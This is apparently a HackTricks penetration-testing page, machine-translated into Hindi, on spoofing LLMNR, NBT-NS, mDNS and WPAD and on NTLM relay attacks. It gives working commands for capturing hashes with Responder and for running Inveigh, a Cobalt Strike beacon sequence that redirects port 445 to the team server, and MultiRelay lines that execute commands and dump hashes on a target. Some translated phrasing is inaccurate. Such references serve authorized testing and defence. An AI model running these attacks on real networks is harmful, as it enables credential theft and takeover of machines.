Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

नेटवर्क प्रोटोकॉल

स्थानीय होस्ट संकेत प्रोटोकॉल

  • LLMNR, NBT-NS, और mDNS:

  • माइक्रोसॉफ्ट और अन्य ऑपरेटिंग सिस्टम LLMNR और NBT-NS का उपयोग करते हैं जब DNS विफल होता है। उसी तरह, Apple और Linux सिस्टम mDNS का उपयोग करते हैं।

  • ये प्रोटोकॉल अपने अथेंटिकेटेड, यूडीपी पर प्रसारित प्रकृति के कारण अंतर्दृष्टि और स्पूफिंग के लिए संवेदनशील हैं।

  • Responder का उपयोग किया जा सकता है सेवाओं का अनुकरण करने के लिए जो इन प्रोटोकॉलों का प्रश्न कर रहे होस्ट्स को झूठे जवाब भेजकर।

  • Responder का उपयोग करके सेवा अनुकरण के बारे में अधिक जानकारी यहाँ मिल सकती है।

वेब प्रॉक्सी ऑटो-डिस्कवरी प्रोटोकॉल (WPAD)

  • WPAD ब्राउज़र को प्रॉक्सी सेटिंग्स को स्वचालित रूप से खोजने की अनुमति देता है।

  • खोज DHCP, DNS के माध्यम से सुविधा प्रदान करता है, या DNS विफल होने पर LLMNR और NBT-NS में लौटने की सुविधा प्रदान करता है।

  • Responder द्वारा WPAD हमलों को स्वचालित कर सकता है, ग्राहकों को दुरुपयोगी WPAD सर्वरों पर निर्देशित करता है।

प्रोटोकॉल पॉइजनिंग के लिए Responder

  • Responder एक उपकरण है जो LLMNR, NBT-NS, और mDNS क्वेरी को पॉइजन करने के लिए उपयोग किया जाता है, प्रश्न प्रकार के आधार पर चुनकर प्रतिक्रिया देता है, मुख्य रूप से SMB सेवाओं को लक्ष्य बनाता है।

  • यह Kali Linux में पूर्व-स्थापित है, /etc/responder/Responder.conf में कॉन्फ़िगर किया जा सकता है।

  • Responder स्क्रीन पर पकड़े गए हैश प्रदर्शित करता है और उन्हें /usr/share/responder/logs निर्देशिका में सहेजता है।

  • यह IPv4 और IPv6 दोनों का समर्थन करता है।

  • Responder का Windows संस्करण यहाँ उपलब्ध है: यहाँ

Responder चलाना

  • डिफ़ॉल्ट सेटिंग्स के साथ Responder चलाने के लिए: responder -I <Interface>

  • अधिक प्रवेश के लिए प्रोबिंग (संभावित परिणामों के साथ): responder -I <Interface> -P -r -v

  • NTLMv1 चैलेंज/प्रतिक्रिया को आसान क्रैकिंग के लिए कैप्चर करने के तकनीक: responder -I <Interface> --lm --disable-ess

  • WPAD अनुकरण को सक्रिय करने के लिए: responder -I <Interface> --wpad

  • NetBIOS अनुरोधों को हमलावर के IP पर हल किया जा सकता है, और प्रमाणीकरण प्रॉक्सी सेट किया जा सकता है: responder.py -I <interface> -Pv

Responder के साथ DHCP पॉइजनिंग

  • DHCP प्रतिक्रियाओं को स्पूफ़ करने से एक पीड़ित का रूटिंग सूचना स्थायी रूप से पॉइजन की जा सकती है, ARP पॉइजनिंग के लिए एक गुप्त वैकल्पिकता प्रदान करती है।

  • लक्ष्य नेटवर्क के विन्यास के सटीक ज्ञान की आवश्यकता होती है।

  • हमला चलाने के लिए: ./Responder.py -I eth0 -Pdv

  • यह विधि NTLMv1/2 हैश को प्रभावी ढंग से कैप्चर कर सकती है, लेकिन नेटवर्क विघटन से बचने के लिए सावधानी से हैंडल करने की आवश्यकता होती है।

Responder के साथ क्रेडेंशियल कैप्चरिंग

  • Responder उपरोक्त प्रोटोकॉल का दुरुपयोग करके सेवाओं का अनुकरण करेगा, क्रेडेंशियल को कैप्चर करेगा (सामान्यत: NTLMv2 चैलेंज/प्रतिक्रिया) जब एक उपयोगकर्ता झूठी सेवाओं के खिलाफ प्रमाणीकरण करने का प्रयास करता है।

  • क्रैकिंग के लिए NetNTLMv1 या ESS को अक्षम करने के लिए प्रयास किए जा सकते हैं।

यह महत्वपूर्ण है कि इन तकनीकों का उपयोग कानूनी और नैतिक रूप से किया जाए, उचित अधिकृति सुनिश्चित की जाए और अवैध पहुंच या अनधिकृत पहुंच से बचा जाए।

Inveigh

Inveigh एक उपकरण है पेनेट्रेशन टेस्टर्स और रेड टीमर्स के लिए, विंडोज सिस्टम के लिए डिज़ाइन किया गया है। यह Responder के समान कार्यक्षमताएँ प्रदान करता है, स्पूफिंग और मैन-इन-द-मिडल हमले करता है। यह उपकरण एक PowerShell स्क्रिप्ट से C# बाइनरी में विकसित हुआ है, Inveigh और InveighZero मुख्य संस्करण हैं। विस्तृत पैरामीटर और निर्देशों की जानकारी विकि में उपलब्ध है।

Inveigh को PowerShell के माध्यम से चलाया जा सकता है:

Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y

या C# बाइनरी के रूप में निष्पादित:

Inveigh.exe

NTLM रिले हमला

यह हमला SMB प्रमाणीकरण सत्रों का उपयोग करता है एक लक्ष्य मशीन तक पहुंचने के लिए, सफल होने पर एक सिस्टम शैल प्रदान करता है। मुख्य आवश्यकताएं शामिल हैं:

  • प्रमाणित करने वाले उपयोगकर्ता को रिले होस्ट पर स्थानीय व्यवस्थापक एक्सेस होना चाहिए।

  • SMB साइनिंग को अक्षम कर दिया जाना चाहिए।

445 पोर्ट फॉरवर्डिंग और टनलिंग

उन परिस्थितियों में जहाँ सीधा नेटवर्क परिचय संभव नहीं है, पोर्ट 445 पर ट्रैफिक को फॉरवर्ड और टनल किया जाना चाहिए। PortBender जैसे उपकरण सहायक होते हैं पोर्ट 445 ट्रैफिक को एक और पोर्ट पर पुनर्निर्देशित करने में, जो ड्राइवर लोडिंग के लिए स्थानीय व्यवस्थापक एक्सेस उपलब्ध होने पर आवश्यक है।

कोबाल्ट स्ट्राइक में PortBender सेटअप और ऑपरेशन:

Cobalt Strike -> Script Manager -> Load (Select PortBender.cna)

beacon> cd C:\Windows\system32\drivers # Navigate to drivers directory
beacon> upload C:\PortBender\WinDivert64.sys # Upload driver
beacon> PortBender redirect 445 8445 # Redirect traffic from port 445 to 8445
beacon> rportfwd 8445 127.0.0.1 445 # Route traffic from port 8445 to Team Server
beacon> socks 1080 # Establish a SOCKS proxy on port 1080

# Termination commands
beacon> jobs
beacon> jobkill 0
beacon> rportfwd stop 8445
beacon> socks stop

NTLM रिले हमले के लिए अन्य उपकरण

  • Metasploit: प्रॉक्सी, स्थानीय और दूरस्थ होस्ट विवरण के साथ सेटअप करें।

  • smbrelayx: SMB सत्रों को रिले करने और कमांड या बैकडोअर लागू करने के लिए एक Python स्क्रिप्ट।

  • MultiRelay: एक उपकरण Responder सुइट से, विशिष्ट उपयोगकर्ताओं या सभी उपयोगकर्ताओं को रिले करने, कमांड चलाने या हैश डंप करने के लिए।

हर उपकरण को यदि आवश्यक हो तो एक SOCKS प्रॉक्सी के माध्यम से संरचित किया जा सकता है, जो अप्रत्यक्ष नेटवर्क एक्सेस के साथ भी हमले को संभावित बनाता है।

MultiRelay ऑपरेशन

MultiRelay को /usr/share/responder/tools निर्देशिका से निर्वाहित किया जाता है, विशिष्ट आईपी या उपयोगकर्ताओं को लक्षित करके।

python MultiRelay.py -t <IP target> -u ALL # Relay all users
python MultiRelay.py -t <IP target> -u ALL -c whoami # Execute command
python MultiRelay.py -t <IP target> -u ALL -d # Dump hashes

# Proxychains for routing traffic

Force NTLM Logins

Windows में आपको कुछ विशेषाधिकारी खातों को विभिन्न मशीनों पर प्रमाणीकृत करने के लिए मजबूर किया जा सकता है। निम्नलिखित पृष्ठ को पढ़ें और जानें कैसे:

pageForce NTLM Privileged Authentication

संदर्भ

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

Last updated